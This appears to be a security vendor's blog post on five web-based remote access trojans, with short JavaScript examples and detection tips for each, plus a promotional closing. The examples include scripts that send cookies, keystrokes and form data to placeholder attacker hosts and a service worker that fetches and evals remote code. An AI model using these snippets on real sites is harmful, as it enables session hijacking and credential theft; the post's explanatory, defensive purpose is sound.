There was a time when Remote Access Trojans (RATs) thrived solely on executable files and email attachments. In 2025, things have changed. Modern attackers are leveraging the web its vast reach, dynamic capabilities, and cross-platform accessibility to embed RATs directly into browser sessions, JavaScript code, and remote resources. These aren’t your typical download-and-run payloads. These web-based RATs can hijack browser sessions, exploit session cookies, and tunnel through web sockets sometimes without dropping a single file on disk.
In this blog, I’ll break down the top 5 most dangerous web-based RATs I’ve seen this year, explore how they’re built, and share some hard-earned detection strategies. But before we jump in, let’s clarify what makes web-based RATs different from traditional or even mobile RATs.
-Book Your Free Security Consultation Today!
Table of Contents
What Are Web-Based RATs?
Web-based RATs are Remote Access Trojans that operate through the browser or web technologies instead of relying on traditional binary executables. They are often built using JavaScript, WebAssembly, or heavily obfuscated HTML5 code. Here’s what makes them particularly dangerous:
Fileless Execution: They often run entirely in-memory or within a sandboxed browser context.
Cross-Platform: Since they rely on web technologies, they can affect Windows, macOS, Linux, and even mobile operating systems.
Cloud Communication: Many use WebSocket or HTTP/3 tunnels to exfiltrate data and receive commands.
These RATs often infect users via phishing emails, malicious ads (malvertising), or compromised websites.
-Check Out This Blog on How To Detect Stealthy .Net Malware
1. PhantomJSRAT
Overview
PhantomJSRAT leverages headless browsers like PhantomJS or Puppeteer to interact with a user’s session invisibly. The RAT can steal session cookies, perform automated clicks, and scrape sensitive form data.
Implementation Strategy
Injected through XSS or injected directly via iframe exploits.
Uses
eval()andFunction()calls to load encrypted payloads.Stores exfiltrated data in localStorage or sends it out via WebSocket.
Code Walkthrough:
// Injected script on compromised webpage
let ws = new WebSocket('wss://malicious-c2.com');
ws.onopen = () => {
ws.send(document.cookie); // Send session cookies
document.querySelectorAll('input').forEach(input => {
input.addEventListener('input', () => {
ws.send(`${input.name}: ${input.value}`);
});
});
};
Detection Tip
Use browser extension logs or endpoint solutions that monitor WebSocket connections from the browser context. Any suspicious traffic to unknown WebSocket domains should be examined.
2. ShadowFrame
Overview
ShadowFrame is a modular web RAT that loads itself into invisible iframes. It’s used to log keystrokes, control the DOM, and hijack user interactions—often without raising any alerts.
Implementation Strategy
Delivered via JavaScript through ad networks.
Loads in a hidden iframe targeting popular web portals.
Uses
postMessage()to communicate between frames and send stolen data.
Code Walkthrough:
// Hidden iframe loader
let iframe = document.createElement('iframe');
iframe.style.display = 'none';
iframe.src = 'https://malicious.site/frame.html';
document.body.appendChild(iframe);
window.addEventListener('message', event => {
fetch('https://malicious.site/data', {
method: 'POST',
body: event.data
});
});
Detection Tip
Monitor the DOM using browser developer tools or endpoint telemetry for suspicious invisible elements and inter-frame communication. Shadow DOMs are often overlooked by conventional scanners.
3. WebSpyder
Overview
WebSpyder operates as a browser extension pretending to be a utility plugin. Once installed, it hijacks tabs, injects remote scripts, and siphons off keystrokes, screenshots, and clipboard data.
Implementation Strategy
Delivered via phishing sites that trick users into installing the extension.
Uses Chrome’s extension APIs to monitor browser activity.
Periodically pings the C2 for new modules.
Code Walkthrough:
// Background script in a malicious browser extension
chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
if (changeInfo.status === 'complete') {
chrome.tabs.executeScript(tabId, {
file: 'content_script.js'
});
}
Detection Tip
Audit installed browser extensions regularly. Look for extensions requesting permissions like tabs, clipboardRead, or host_permissions across all sites.
4. JSBender
Overview
JSBender is a stealthy RAT written entirely in JavaScript. It’s dropped through JavaScript-heavy phishing pages and lives only as long as the browser session does. Great for smash-and-grab credential theft.
Implementation Strategy
Uses obfuscated code with frequent
evaloratob()layers.Hooks into event listeners like
onkeypressandonsubmit.Communicates via fetch() to mimic standard web traffic.
Code Walkthrough:
// Dynamic data exfiltration
function hookForms() {
document.forms.forEach(form => {
form.onsubmit = () => {
let formData = new FormData(form);
fetch('https://badhost.ru/submit', { method: 'POST', body: formData });
};
});
}
window.onload = hookForms;
Detection Tip
Scan browser sessions for heavily obfuscated JavaScript, especially if it’s dynamically loaded from third-party domains.
5. OblivionLoader
Overview
OblivionLoader isn’t technically a RAT on its own, but it’s a dynamic loader for browser-based malware. Once a user visits a compromised site, it fingerprints the browser and then loads the appropriate RAT module—tailored to the environment.
Implementation Strategy
Uses fingerprint.js or custom device profiling.
Dynamically assembles RAT payload from base64-encoded chunks.
Leverages service workers for persistence across sessions.
Code Walkthrough:
// Service worker that loads payloads
self.addEventListener('install', () => {
fetch('https://badcdn.com/moduleA.js')
.then(res => res.text())
.then(js => eval(js));
});
Detection Tip
Disable or restrict service worker registration on enterprise endpoints. Monitor fetch calls from service worker contexts.
Conclusion
Web-based RATs are no longer just side-channel threats—they’ve become full-fledged attack platforms. Their stealth, cross-platform capabilities, and fileless nature make them exceptionally hard to detect. The top 5 mentioned here are only the tip of the iceberg in 2025’s threat landscape.
If you’re building detection strategies, your focus should shift from traditional file scanning to behavioral analysis and browser telemetry. Use script sanitizers, browser hardening extensions, and endpoint DNS filters. And always, always check your browser’s extensions and service workers.
Why Businesses Trust SecureMyOrg for Comprehensive Network Security
At SecureMyOrg, we uncover and fix all possible security vulnerabilities of mobile and web, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!
Some of the things people reach out to us for –
- Building their cybersecurity program from scratch – setting up cloud security using cost-effective tools, SIEM for alert monitoring, building policies for the company
- Vulnerability Assessment and Penetration Testing ( VAPT ) – We have certified professionals, with certifications like OSCP, CREST – CPSA & CRT, CKA and CKS
- DevSecOps consulting
- Red Teaming activity
- Regular security audits, before product release
- Full time security engineers.
Relevant Posts
Top 5 IoT Remote Access Trojans Crippling Devices in 2025
IoT devices are under siege in 2025 as Remote Access Trojans exploit their vulnerabilities at scale. This blog breaks down the top 5 IoT RATs causing widespread disruption.
Top 5 Web-Based Remote Access Trojans That Are Dominating 2025
Web-based Remote Access Trojans are becoming the go-to tool for cybercriminals in 2025. This post highlights five of the most widespread and dangerous ones currently in use.
Unstoppable Malware: Top 5 Modular Remote Access Trojans Dominating 2025
Modular Remote Access Trojans are evolving fast in 2025, making them harder to detect and remove. This post explores five of the most dangerous RATs currently used in cyberattacks.
Top 5 Mobile Remote Access Trojans Wreaking Havoc in 2025
Uncover the top 5 mobile RATs of 2025, learn how they infect devices, execute attacks, and discover key strategies to detect and stop them effectively.
Top 5 Advanced Persistent Remote Access Trojans (RATs) in 2025
This blog explores five of the most sophisticated Advanced Persistent Remote Access Trojans (AP-RATs) currently active in the cyber threat landscape. We analyze their infection vectors, stealth mechanisms, command-and-control infrastructure, and persistence techniques to help security professionals understand and defend against these high-risk threats.
Top 5 Basic Remote Access Trojans (RATs) You Shouldn’t Ignore in 2025
Remote Access Trojans (RATs) remain a major cybersecurity threat in 2025. Learn about the top 5 basic yet dangerous RATs known for stealthy infiltration, keylogging, and full system control. Learn how they operate and how to defend against them.